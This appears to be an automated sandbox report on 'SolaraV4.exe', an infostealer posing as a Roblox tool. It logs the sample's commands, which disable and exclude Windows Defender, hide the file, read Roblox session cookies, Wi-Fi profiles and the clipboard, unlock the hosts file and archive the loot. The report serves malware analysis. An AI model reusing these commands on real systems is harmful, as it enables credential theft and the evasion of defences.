Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: libcrypto-1_1.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.998725
Source: libssl-1_1.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9921420784883721
Source: python310.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9989874988941967
Source: sqlite3.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.99755859375
Source: unicodedata.pyd.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9942085908882784
Source: classification engine Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@207/68@4/3
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FCAFC GetLastError,FormatMessageW, 108_2_00007FF7C71FCAFC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 108_2_00007FF7C722B57C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 108_2_00007FF7C71FEF50
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7203144 GetDiskFreeSpaceExW, 108_2_00007FF7C7203144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\SIHClient.exe Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
Source: C:\Users\user\Desktop\SolaraV4.exe Mutant created: \Sessions\1\BaseNamedObjects\Z
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122
Source: SolaraV4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SolaraV4.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SolaraV4.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: SolaraV4.exe ReversingLabs: Detection: 52%
Source: SolaraV4.exe String found in binary or memory: set-addPolicy
Source: SolaraV4.exe String found in binary or memory: id-cmc-addExtensions
Source: SolaraV4.exe String found in binary or memory: can't send non-None value to a just-started %s
Source: SolaraV4.exe String found in binary or memory: --help
Source: SolaraV4.exe String found in binary or memory: --help
Source: C:\Users\user\Desktop\SolaraV4.exe File read: C:\Users\user\Desktop\SolaraV4.exe
Source: unknown Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\tree.com Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv ANBeg33fjE+FOmtUGvWY6g.0.2
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6CAA.tmp" "c:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
